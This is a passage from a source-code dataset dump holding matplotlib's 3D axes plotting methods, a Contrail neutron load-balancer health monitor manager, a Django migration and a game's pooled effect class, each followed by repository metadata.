v2 = np.array(topverts[0][i1]) - np.array(botverts[0][i1])
normals.append(np.cross(v1, v2))
colors = self._shade_colors(color, normals)
colors2 = self._shade_colors(color, normals)
polycol = art3d.Poly3DCollection(polyverts,
facecolors=colors,
edgecolors=colors2)
polycol.set_sort_zpos(z)
self.add_collection3d(polycol)
for col in colls:
self.collections.remove(col)
def add_contour_set(self, cset, extend3d=False, stride=5, zdir='z', offset=None):
zdir = '-' + zdir
if extend3d:
self._3d_extend_contour(cset, stride)
else:
for z, linec in zip(cset.levels, cset.collections):
if offset is not None:
z = offset
art3d.line_collection_2d_to_3d(linec, z, zdir=zdir)
def add_contourf_set(self, cset, zdir='z', offset=None):
zdir = '-' + zdir
for z, linec in zip(cset.levels, cset.collections):
if offset is not None :
z = offset
art3d.poly_collection_2d_to_3d(linec, z, zdir=zdir)
linec.set_sort_zpos(z)
def contour(self, X, Y, Z, *args,
extend3d=False, stride=5, zdir='z', offset=None, **kwargs):
'''
Create a 3D contour plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*extend3d* Whether to extend contour in 3D (default: False)
*stride* Stride (step size) for extending contour
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
The positional and other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.contour`
Returns a :class:`~matplotlib.axes.Axes.contour`
'''
had_data = self.has_data()
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
cset = super().contour(jX, jY, jZ, *args, **kwargs)
self.add_contour_set(cset, extend3d, stride, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
contour3D = contour
def tricontour(self, *args,
extend3d=False, stride=5, zdir='z', offset=None, **kwargs):
"""
Create a 3D contour plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*extend3d* Whether to extend contour in 3D (default: False)
*stride* Stride (step size) for extending contour
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
Other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.tricontour`
Returns a :class:`~matplotlib.axes.Axes.contour`
.. versionchanged:: 1.3.0
Added support for custom triangulations
EXPERIMENTAL: This method currently produces incorrect output due to a
longstanding bug in 3D PolyCollection rendering.
"""
had_data = self.has_data()
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(
*args, **kwargs)
X = tri.x
Y = tri.y
if 'Z' in kwargs:
Z = kwargs.pop('Z')
else:
Z = args[0]
# We do this so Z doesn't get passed as an arg to Axes.tricontour
args = args[1:]
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
tri = Triangulation(jX, jY, tri.triangles, tri.mask)
cset = super().tricontour(tri, jZ, *args, **kwargs)
self.add_contour_set(cset, extend3d, stride, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
def contourf(self, X, Y, Z, *args, zdir='z', offset=None, **kwargs):
'''
Create a 3D contourf plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the filled contour
on this position in plane normal to zdir
========== ================================================
The positional and keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.contourf`
Returns a :class:`~matplotlib.axes.Axes.contourf`
.. versionchanged :: 1.1.0
The *zdir* and *offset* kwargs were added.
'''
had_data = self.has_data()
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
cset = super().contourf(jX, jY, jZ, *args, **kwargs)
self.add_contourf_set(cset, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
contourf3D = contourf
def tricontourf(self, *args, zdir='z', offset=None, **kwargs):
"""
Create a 3D contourf plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
Other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.tricontour`
Returns a :class:`~matplotlib.axes.Axes.contour`
.. versionchanged :: 1.3.0
Added support for custom triangulations
EXPERIMENTAL: This method currently produces incorrect output due to a
longstanding bug in 3D PolyCollection rendering.
"""
had_data = self.has_data()
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(
*args, **kwargs)
X = tri.x
Y = tri.y
if 'Z' in kwargs:
Z = kwargs.pop('Z')
else:
Z = args[0]
# We do this so Z doesn't get passed as an arg to Axes.tricontourf
args = args[1:]
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
tri = Triangulation(jX, jY, tri.triangles, tri.mask)
cset = super().tricontourf(tri, jZ, *args, **kwargs)
self.add_contourf_set(cset, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
def add_collection3d(self, col, zs=0, zdir='z'):
'''
Add a 3D collection object to the plot.
2D collection types are converted to a 3D version by
modifying the object and adding z coordinate information.
Supported are:
- PolyCollection
- LineCollection
- PatchCollection
'''
zvals = np.atleast_1d(zs)
if len(zvals) > 0 :
zsortval = min(zvals)
else :
zsortval = 0 # FIXME: Fairly arbitrary. Is there a better value?
# FIXME: use issubclass() (although, then a 3D collection
# object would also pass.) Maybe have a collection3d
# abstract class to test for and exclude?
if type(col) is mcoll.PolyCollection:
art3d.poly_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
elif type(col) is mcoll.LineCollection:
art3d.line_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
elif type(col) is mcoll.PatchCollection:
art3d.patch_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
super().add_collection(col)
def scatter(self, xs, ys, zs=0, zdir='z', s=20, c=None, depthshade=True,
*args, **kwargs):
"""
Create a scatter plot.
Parameters
----------
xs, ys : array-like
The data positions.
zs : float or array-like, optional, default: 0
The z-positions. Either an array of the same length as *xs* and
*ys* or a single value to place all points in the same plane.
zdir : {'x', 'y', 'z', '-x', '-y', '-z'}, optional, default: 'z'
The axis direction for the *zs*. This is useful when plotting 2D
data on a 3D Axes. The data must be passed as *xs*, *ys*. Setting
*zdir* to 'y' then plots the data to the x-z-plane.
See also :doc:`/gallery/mplot3d/2dcollections3d`.
s : scalar or array-like, optional, default: 20
The marker size in points**2. Either an array of the same length
as *xs* and *ys* or a single value to make all markers the same
size.
c : color, sequence, or sequence of color, optional
The marker color. Possible values:
- A single color format string.
- A sequence of color specifications of length n.
- A sequence of n numbers to be mapped to colors using *cmap* and
*norm*.
- A 2-D array in which the rows are RGB or RGBA.
For more details see the *c* argument of `~.axes.Axes.scatter`.
depthshade : bool, optional, default: True
Whether to shade the scatter markers to give the appearance of
depth.
**kwargs
All other arguments are passed on to `~.axes.Axes.scatter`.
Returns
-------
paths : `~matplotlib.collections.PathCollection`
"""
had_data = self.has_data()
xs, ys, zs = np.broadcast_arrays(
*[np.ravel(np.ma.filled(t, np.nan)) for t in [xs, ys, zs]])
s = np.ma.ravel(s) # This doesn't have to match x, y in size.
xs, ys, zs, s, c = cbook.delete_masked_points(xs, ys, zs, s, c)
patches = super().scatter(xs, ys, s=s, c=c, *args, **kwargs)
is_2d = not cbook.iterable(zs)
zs = np.broadcast_to(zs, len(xs))
art3d.patch_collection_2d_to_3d(patches, zs=zs, zdir=zdir,
depthshade=depthshade)
if self._zmargin < 0.05 and xs.size > 0:
self.set_zmargin(0.05)
#FIXME: why is this necessary?
if not is_2d:
self.auto_scale_xyz(xs, ys, zs, had_data)
return patches
scatter3D = scatter
def bar(self, left, height, zs=0, zdir='z', *args, **kwargs):
'''
Add 2D bar(s).
========== ================================================
Argument Description
========== ================================================
*left* The x coordinates of the left sides of the bars.
*height* The height of the bars.
*zs* Z coordinate of bars, if one value is specified
they will all be placed at the same z.
*zdir* Which direction to use as z ('x', 'y' or 'z')
when plotting a 2D set.
========== ================================================
Keyword arguments are passed onto :func:`~matplotlib.axes.Axes.bar`.
Returns a :class:`~mpl_toolkits.mplot3d.art3d.Patch3DCollection`
'''
had_data = self.has_data()
patches = super().bar(left, height, *args, **kwargs)
zs = np.broadcast_to(zs, len(left))
verts = []
verts_zs = []
for p, z in zip(patches, zs):
vs = art3d.get_patch_verts(p)
verts += vs.tolist()
verts_zs += [z] * len(vs)
art3d.patch_2d_to_3d(p, z, zdir)
if 'alpha' in kwargs:
p.set_alpha(kwargs['alpha'])
if len(verts) > 0 :
# the following has to be skipped if verts is empty
# NOTE: Bugs could still occur if len(verts) > 0,
# but the "2nd dimension" is empty.
xs, ys = list(zip(*verts))
else :
xs, ys = [], []
xs, ys, verts_zs = art3d.juggle_axes(xs, ys, verts_zs, zdir)
self.auto_scale_xyz(xs, ys, verts_zs, had_data)
return patches
def bar3d(self, x, y, z, dx, dy, dz, color=None,
zsort='average', shade=True, *args, **kwargs):
"""Generate a 3D barplot.
This method creates three dimensional barplot where the width,
depth, height, and color of the bars can all be uniquely set.
Parameters
----------
x, y, z : array-like
The coordinates of the anchor point of the bars.
dx, dy, dz : scalar or array-like
The width, depth, and height of the bars, respectively.
color : sequence of valid color specifications, optional
The color of the bars can be specified globally or
individually. This parameter can be:
- A single color value, to color all bars the same color.
- An array of colors of length N bars, to color each bar
independently.
- An array of colors of length 6, to color the faces of the
bars similarly.
- An array of colors of length 6 * N bars, to color each face
independently.
When coloring the faces of the boxes specifically, this is
the order of the coloring:
1. -Z (bottom of box)
2. +Z (top of box)
3. -Y
4. +Y
5. -X
6. +X
zsort : str, optional
The z-axis sorting scheme passed onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
shade : bool, optional (default = True)
When true, this shades the dark sides of the bars (relative
to the plot's source of light).
Any additional keyword arguments are passed onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
Returns
-------
collection : Poly3DCollection
A collection of three dimensional polygons representing
the bars.
"""
had_data = self.has_data()
x, y, z, dx, dy, dz = np.broadcast_arrays(
np.atleast_1d(x), y, z, dx, dy, dz)
minx = np.min(x)
maxx = np.max(x + dx)
miny = np.min(y)
maxy = np.max(y + dy)
minz = np.min(z)
maxz = np.max(z + dz)
polys = []
for xi, yi, zi, dxi, dyi, dzi in zip(x, y, z, dx, dy, dz):
polys.extend([
((xi, yi, zi), (xi + dxi, yi, zi),
(xi + dxi, yi + dyi, zi), (xi, yi + dyi, zi)),
((xi, yi, zi + dzi), (xi + dxi, yi, zi + dzi),
(xi + dxi, yi + dyi, zi + dzi), (xi, yi + dyi, zi + dzi)),
((xi, yi, zi), (xi + dxi, yi, zi),
(xi + dxi, yi, zi + dzi), (xi, yi, zi + dzi)),
((xi, yi + dyi, zi), (xi + dxi, yi + dyi, zi),
(xi + dxi, yi + dyi, zi + dzi), (xi, yi + dyi, zi + dzi)),
((xi, yi, zi), (xi, yi + dyi, zi),
(xi, yi + dyi, zi + dzi), (xi, yi, zi + dzi)),
((xi + dxi, yi, zi), (xi + dxi, yi + dyi, zi),
(xi + dxi, yi + dyi, zi + dzi), (xi + dxi, yi, zi + dzi)),
])
facecolors = []
if color is None:
color = [self._get_patches_for_fill.get_next_color()]
if len(color) == len(x):
# bar colors specified, need to expand to number of faces
for c in color:
facecolors.extend([c] * 6)
else:
# a single color specified, or face colors specified explicitly
facecolors = list(mcolors.to_rgba_array(color))
if len(facecolors) < len(x):
facecolors *= (6 * len(x))
if shade:
normals = self._generate_normals(polys)
sfacecolors = self._shade_colors(facecolors, normals)
else:
sfacecolors = facecolors
col = art3d.Poly3DCollection(polys,
zsort=zsort,
facecolor=sfacecolors,
*args, **kwargs)
self.add_collection(col)
self.auto_scale_xyz((minx, maxx), (miny, maxy), (minz, maxz), had_data)
return col
def set_title(self, label, fontdict=None, loc='center', **kwargs):
ret = super().set_title(label, fontdict=fontdict, loc=loc, **kwargs)
(x, y) = self.title.get_position()
self.title.set_y(0.92 * y)
return ret
set_title.__doc__ = maxes.Axes.set_title.__doc__
def quiver(self, *args,
length=1, arrow_length_ratio=.3, pivot='tail', normalize=False,
**kwargs):
"""
Plot a 3D field of arrows.
call signatures::
quiver(X, Y, Z, U, V, W, **kwargs)
Arguments:
*X*, *Y*, *Z*:
The x, y and z coordinates of the arrow locations (default is
tail of arrow; see *pivot* kwarg)
*U*, *V*, *W*:
The x, y and z components of the arrow vectors
The arguments could be array-like or scalars, so long as they
they can be broadcast together. The arguments can also be
masked arrays. If an element in any of argument is masked, then
that corresponding quiver element will not be plotted.
Keyword arguments:
*length*: [1.0 | float]
The length of each quiver, default to 1.0, the unit is
the same with the axes
*arrow_length_ratio*: [0.3 | float]
The ratio of the arrow head with respect to the quiver,
default to 0.3
*pivot*: [ 'tail' | 'middle' | 'tip' ]
The part of the arrow that is at the grid point; the arrow
rotates about this point, hence the name *pivot*.
Default is 'tail'
*normalize*: bool
When True, all of the arrows will be the same length. This
defaults to False, where the arrows will be different lengths
depending on the values of u,v,w.
Any additional keyword arguments are delegated to
:class:`~matplotlib.collections.LineCollection`
"""
def calc_arrow(uvw, angle=15):
"""
To calculate the arrow head. uvw should be a unit vector.
We normalize it here:
"""
# get unit direction vector perpendicular to (u,v,w)
norm = np.linalg.norm(uvw[:2])
if norm > 0:
x = uvw[1] / norm
y = -uvw[0] / norm
else:
x, y = 0, 1
# compute the two arrowhead direction unit vectors
ra = math.radians(angle)
c = math.cos(ra)
s = math.sin(ra)
# construct the rotation matrices
Rpos = np.array([[c+(x**2)*(1-c), x*y*(1-c), y*s],
[y*x*(1-c), c+(y**2)*(1-c), -x*s],
[-y*s, x*s, c]])
# opposite rotation negates all the sin terms
Rneg = Rpos.copy()
Rneg[[0,1,2,2],[2,2,0,1]] = -Rneg[[0,1,2,2],[2,2,0,1]]
# multiply them to get the rotated vector
return Rpos.dot(uvw), Rneg.dot(uvw)
had_data = self.has_data()
# handle args
argi = 6
if len(args) < argi:
raise ValueError('Wrong number of arguments. Expected %d got %d' %
(argi, len(args)))
# first 6 arguments are X, Y, Z, U, V, W
input_args = args[:argi]
# if any of the args are scalar, convert into list
input_args = [[k] if isinstance(k, (int, float)) else k
for k in input_args]
# extract the masks, if any
masks = [k.mask for k in input_args if isinstance(k, np.ma.MaskedArray)]
# broadcast to match the shape
bcast = np.broadcast_arrays(*(input_args + masks))
input_args = bcast[:argi]
masks = bcast[argi:]
if masks:
# combine the masks into one
mask = reduce(np.logical_or, masks)
# put mask on and compress
input_args = [np.ma.array(k, mask=mask).compressed()
for k in input_args]
else:
input_args = [k.flatten() for k in input_args]
if any(len(v) == 0 for v in input_args):
# No quivers, so just make an empty collection and return early
linec = art3d.Line3DCollection([], *args[argi:], **kwargs)
self.add_collection(linec)
return linec
# Following assertions must be true before proceeding
# must all be ndarray
assert all(isinstance(k, np.ndarray) for k in input_args)
# must all in same shape
assert len({k.shape for k in input_args}) == 1
shaft_dt = np.linspace(0, length, num=2)
arrow_dt = shaft_dt * arrow_length_ratio
if pivot == 'tail':
shaft_dt -= length
elif pivot == 'middle':
shaft_dt -= length/2.
elif pivot != 'tip':
raise ValueError('Invalid pivot argument: ' + str(pivot))
XYZ = np.column_stack(input_args[:3])
UVW = np.column_stack(input_args[3:argi]).astype(float)
# Normalize rows of UVW
norm = np.linalg.norm(UVW, axis=1)
# If any row of UVW is all zeros, don't make a quiver for it
mask = norm > 0
XYZ = XYZ[mask]
if normalize:
UVW = UVW[mask] / norm[mask].reshape((-1, 1))
else:
UVW = UVW[mask]
if len(XYZ) > 0:
# compute the shaft lines all at once with an outer product
shafts = (XYZ - np.multiply.outer(shaft_dt, UVW)).swapaxes(0, 1)
# compute head direction vectors, n heads by 2 sides by 3 dimensions
head_dirs = np.array([calc_arrow(d) for d in UVW])
# compute all head lines at once, starting from where the shaft ends
heads = shafts[:, :1] - np.multiply.outer(arrow_dt, head_dirs)
# stack left and right head lines together
heads.shape = (len(arrow_dt), -1, 3)
# transpose to get a list of lines
heads = heads.swapaxes(0, 1)
lines = [*shafts, *heads]
else:
lines = []
linec = art3d.Line3DCollection(lines, *args[argi:], **kwargs)
self.add_collection(linec)
self.auto_scale_xyz(XYZ[:, 0], XYZ[:, 1], XYZ[:, 2], had_data)
return linec
quiver3D = quiver
def voxels(self, *args, facecolors=None, edgecolors=None, **kwargs):
"""
ax.voxels([x, y, z,] /, filled, **kwargs)
Plot a set of filled voxels
All voxels are plotted as 1x1x1 cubes on the axis, with filled[0,0,0]
placed with its lower corner at the origin. Occluded faces are not
plotted.
Call signatures::
voxels(filled, facecolors=fc, edgecolors=ec, **kwargs)
voxels(x, y, z, filled, facecolors=fc, edgecolors=ec, **kwargs)
.. versionadded:: 2.1
Parameters
----------
filled : 3D np.array of bool
A 3d array of values, with truthy values indicating which voxels
to fill
x, y, z : 3D np.array, optional
The coordinates of the corners of the voxels. This should broadcast
to a shape one larger in every dimension than the shape of `filled`.
These can be used to plot non-cubic voxels.
If not specified, defaults to increasing integers along each axis,
like those returned by :func:`~numpy.indices`.
As indicated by the ``/`` in the function signature, these arguments
can only be passed positionally.
facecolors, edgecolors : array_like, optional
The color to draw the faces and edges of the voxels. Can only be
passed as keyword arguments.
This parameter can be:
- A single color value, to color all voxels the same color. This
can be either a string, or a 1D rgb/rgba array
- ``None``, the default, to use a single color for the faces, and
the style default for the edges.
- A 3D ndarray of color names, with each item the color for the
corresponding voxel. The size must match the voxels.
- A 4D ndarray of rgb/rgba data, with the components along the
last axis.
**kwargs
Additional keyword arguments to pass onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
Returns
-------
faces : dict
A dictionary indexed by coordinate, where ``faces[i,j,k]`` is a
`Poly3DCollection` of the faces drawn for the voxel
``filled[i,j,k]``. If no faces were drawn for a given voxel, either
because it was not asked to be drawn, or it is fully occluded, then
``(i,j,k) not in faces``.
Examples
--------
.. plot:: gallery/mplot3d/voxels.py
.. plot:: gallery/mplot3d/voxels_rgb.py
.. plot:: gallery/mplot3d/voxels_torus.py
.. plot:: gallery/mplot3d/voxels_numpy_logo.py
"""
# work out which signature we should be using, and use it to parse
# the arguments. Name must be voxels for the correct error message
if len(args) >= 3:
# underscores indicate position only
def voxels(__x, __y, __z, filled, **kwargs):
return (__x, __y, __z), filled, kwargs
else:
def voxels(filled, **kwargs):
return None, filled, kwargs
xyz, filled, kwargs = voxels(*args, **kwargs)
# check dimensions
if filled.ndim != 3:
raise ValueError("Argument filled must be 3-dimensional")
size = np.array(filled.shape, dtype=np.intp)
# check xyz coordinates, which are one larger than the filled shape
coord_shape = tuple(size + 1)
if xyz is None:
x, y, z = np.indices(coord_shape)
else:
x, y, z = (np.broadcast_to(c, coord_shape) for c in xyz)
def _broadcast_color_arg(color, name):
if np.ndim(color) in (0, 1):
# single color, like "red" or [1, 0, 0]
return np.broadcast_to(color, filled.shape + np.shape(color))
elif np.ndim(color) in (3, 4):
# 3D array of strings, or 4D array with last axis rgb
if np.shape(color)[:3] != filled.shape:
raise ValueError(
"When multidimensional, {} must match the shape of "
"filled".format(name))
return color
else:
raise ValueError("Invalid {} argument".format(name))
# broadcast and default on facecolors
if facecolors is None:
facecolors = self._get_patches_for_fill.get_next_color()
facecolors = _broadcast_color_arg(facecolors, 'facecolors')
# broadcast but no default on edgecolors
edgecolors = _broadcast_color_arg(edgecolors, 'edgecolors')
# always scale to the full array, even if the data is only in the center
self.auto_scale_xyz(x, y, z)
# points lying on corners of a square
square = np.array([
[0, 0, 0],
[0, 1, 0],
[1, 1, 0],
[1, 0, 0]
], dtype=np.intp)
voxel_faces = defaultdict(list)
def permutation_matrices(n):
""" Generator of cyclic permutation matices """
mat = np.eye(n, dtype=np.intp)
for i in range(n):
yield mat
mat = np.roll(mat, 1, axis=0)
# iterate over each of the YZ, ZX, and XY orientations, finding faces to
# render
for permute in permutation_matrices(3):
# find the set of ranges to iterate over
pc, qc, rc = permute.T.dot(size)
pinds = np.arange(pc)
qinds = np.arange(qc)
rinds = np.arange(rc)
square_rot = square.dot(permute.T)
# iterate within the current plane
for p in pinds:
for q in qinds:
# iterate perpendicularly to the current plane, handling
# boundaries. We only draw faces between a voxel and an
# empty space, to avoid drawing internal faces.
# draw lower faces
p0 = permute.dot([p, q, 0])
i0 = tuple(p0)
if filled[i0]:
voxel_faces[i0].append(p0 + square_rot)
# draw middle faces
for r1, r2 in zip(rinds[:-1], rinds[1:]):
p1 = permute.dot([p, q, r1])
p2 = permute.dot([p, q, r2])
i1 = tuple(p1)
i2 = tuple(p2)
if filled[i1] and not filled[i2]:
voxel_faces[i1].append(p2 + square_rot)
elif not filled[i1] and filled[i2]:
voxel_faces[i2].append(p2 + square_rot)
# draw upper faces
pk = permute.dot([p, q, rc-1])
pk2 = permute.dot([p, q, rc])
ik = tuple(pk)
if filled[ik]:
voxel_faces[ik].append(pk2 + square_rot)
# iterate over the faces, and generate a Poly3DCollection for each voxel
polygons = {}
for coord, faces_inds in voxel_faces.items():
# convert indices into 3D positions
if xyz is None:
faces = faces_inds
else:
faces = []
for face_inds in faces_inds:
ind = face_inds[:, 0], face_inds[:, 1], face_inds[:, 2]
face = np.empty(face_inds.shape)
face[:, 0] = x[ind]
face[:, 1] = y[ind]
face[:, 2] = z[ind]
faces.append(face)
poly = art3d.Poly3DCollection(faces,
facecolors=facecolors[coord],
edgecolors=edgecolors[coord],
**kwargs
)
self.add_collection3d(poly)
polygons[coord] = poly
return polygons
def get_test_data(delta=0.05):
'''
Return a tuple X, Y, Z with a test data set.
'''
x = y = np.arange(-3.0, 3.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = np.exp(-(X**2 + Y**2) / 2) / (2 * np.pi)
Z2 = (np.exp(-(((X - 1) / 1.5)**2 + ((Y - 1) / 0.5)**2) / 2) /
(2 * np.pi * 0.5 * 1.5))
Z = Z2 - Z1
X = X * 10
Y = Y * 10
Z = Z * 500
return X, Y, Z
########################################################
# Register Axes3D as a 'projection' object available
# for use just like any other axes
########################################################
import matplotlib.projections as proj
proj.projection_registry.register(Axes3D)
| 35.694012
| 85
| 0.538741
|
82639ab55b46aae0472e4b4bf095975a5f0e1c0a
| 4,312
|
py
|
Python
|
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
import uuid
try:
from neutron.extensions import loadbalancer
except ImportError:
from neutron_lbaas.extensions import loadbalancer
try:
from neutron.openstack.common import uuidutils
except ImportError:
from oslo_utils import uuidutils
from vnc_api.vnc_api import IdPermsType
from vnc_api.vnc_api import LoadbalancerHealthmonitor
from vnc_api.vnc_api import LoadbalancerHealthmonitorType
from resource_manager import ResourceManager
class LoadbalancerHealthmonitorManager(ResourceManager):
_loadbalancer_health_type_mapping = {
'admin_state': 'admin_state_up',
'monitor_type': 'type',
'delay': 'delay',
'timeout': 'timeout',
'max_retries': 'max_retries',
'http_method': 'http_method',
'url_path': 'url_path',
'expected_codes': 'expected_codes'
}
@property
def property_type_mapping(self):
return self._loadbalancer_health_type_mapping
def make_properties(self, health_monitor):
props = LoadbalancerHealthmonitorType()
for key, mapping in self._loadbalancer_health_type_mapping.iteritems():
if mapping in health_monitor:
setattr(props, key, health_monitor[mapping])
return props
def make_dict(self, health_monitor, fields=None):
res = {'id': health_monitor.uuid,
'tenant_id': health_monitor.parent_uuid.replace('-', ''),
'status': self._get_object_status(health_monitor)}
props = health_monitor.get_loadbalancer_healthmonitor_properties()
monitor_type = getattr(props, 'monitor_type')
for key, mapping in self._loadbalancer_health_type_mapping.iteritems():
value = getattr(props, key)
if value is not None:
if monitor_type not in ('HTTP', 'HTTPS'):
if mapping in ('http_method', 'url_path', 'expected_codes'):
continue
res[mapping] = value
pool_ids = []
pool_back_refs = health_monitor.get_loadbalancer_pool_back_refs()
for pool_back_ref in pool_back_refs or []:
pool_id = {}
pool_id['pool_id'] = pool_back_ref['uuid']
pool_ids.append(pool_id)
res['pools'] = pool_ids
return self._fields(res, fields)
def resource_read(self, id):
return self._api.loadbalancer_healthmonitor_read(id=id)
def resource_list(self, tenant_id=None):
if tenant_id:
parent_id = str(uuid.UUID(tenant_id))
else:
parent_id = None
return self._api.loadbalancer_healthmonitors_list(parent_id=parent_id)
def resource_update(self, obj):
return self._api.loadbalancer_healthmonitor_update(obj)
def resource_delete(self, id):
return self._api.loadbalancer_healthmonitor_delete(id=id)
def get_exception_notfound(self, id=None):
return loadbalancer.HealthMonitorNotFound(monitor_id=id)
def get_exception_inuse(self, id=None):
return loadbalancer.HealthMonitorInUse(monitor_id=id)
@property
def neutron_name(self):
return "health_monitor"
@property
def resource_name_plural(self):
return "loadbalancer-healthmonitors"
def create(self, context, health_monitor):
"""
Create a loadbalancer_healtmonitor object.
"""
m = health_monitor['health_monitor']
tenant_id = self._get_tenant_id_for_create(context, m)
project = self._project_read(project_id=tenant_id)
uuid = uuidutils.generate_uuid()
props = self.make_properties(m)
id_perms = IdPermsType(enable=True)
monitor_db = LoadbalancerHealthmonitor(
uuid, project, loadbalancer_healthmonitor_properties=props,
id_perms=id_perms)
monitor_db.uuid = uuid
self._api.loadbalancer_healthmonitor_create(monitor_db)
return self.make_dict(monitor_db)
def update_properties(self, monitor_db, id, m):
props = monitor_db.get_loadbalancer_healthmonitor_properties()
if self.update_properties_subr(props, m):
monitor_db.set_loadbalancer_healthmonitor_properties(props)
return True
return False
| 33.952756
| 80
| 0.676716
|
400a70e526d585cca03c0147f2c30a990341b335
| 418
|
py
|
Python
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 1
|
2020-09-21T06:48:47.000Z
|
2020-09-21T06:48:47.000Z
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 5
|
2021-02-05T19:43:08.000Z
|
2021-06-04T23:23:29.000Z
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 6
|
2021-02-06T07:21:37.000Z
|
2021-06-07T12:40:37.000Z
|
# Generated by Django 3.0.7 on 2020-09-30 16:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('incident_reports', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='incident',
name='incident_end',
field=models.DateTimeField(blank=True, default=None, null=True),
),
]
| 22
| 76
| 0.614833
|
98890b8a24a47b0fd2c429f1ebb00d649e76c145
| 1,566
|
py
|
Python
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import *
from direct.showbase import Pool
from direct.showbase.DirectObject import DirectObject
import re
class PooledEffect(DirectObject, NodePath):
GlobalCount = 0
GlobalLimit = 200
pool = None
poolLimit = 30
@classmethod
def getEffect(cls, unlimited=False, context=''):
if cls.pool is None:
cls.pool = Pool.Pool()
if unlimited or PooledEffect.GlobalCount < PooledEffect.GlobalLimit:
if cls.pool.hasFree():
PooledEffect.GlobalCount += 1
return cls.pool.checkout()
else:
free, used = cls.pool.getNumItems()
if free + used < cls.poolLimit:
PooledEffect.GlobalCount += 1
cls.pool.add(cls())
return cls.pool.checkout()
return
@classmethod
def checkInEffect(cls, item):
if cls.pool and cls.pool.isUsed(item):
PooledEffect.GlobalCount -= 1
cls.pool.checkin(item)
@classmethod
def cleanup(cls):
if cls.pool:
cls.pool.cleanup(cls.destroy)
cls.pool = None
return
@classmethod
def setGlobalLimit(cls, limit):
PooledEffect.GlobalLimit = limit
def __init__(self):
NodePath.__init__(self, self.__class__.__name__)
self.accept('clientLogout', self.__class__.cleanup)
def destroy(self, item=None):
if item:
self.pool.remove(item)
self.ignore('clientLogout')
self.removeNode()
| 29.54717
| 76
| 0.59387
|
b61a573d33b65428338a45722eb22a76500df1bb
| 9,949
|
py
|
Python
|
lookerapi/models/dialect_info.py
|
llooker/python_sdk
|
8364839b1de0519771f2f749e45b4e6cb1c75577
|
[
"MIT"
] | 12
|
2019-05-17T11:50:45.000Z
|
2021-11-11T21:37:05.000Z
|
lookerapi/models/dialect_info.py
|
meetup/lookerapi
|
4e4160dbe007eb65ac8f449bead0cdc06090b07b
|
[
"MIT"
] | 4
|
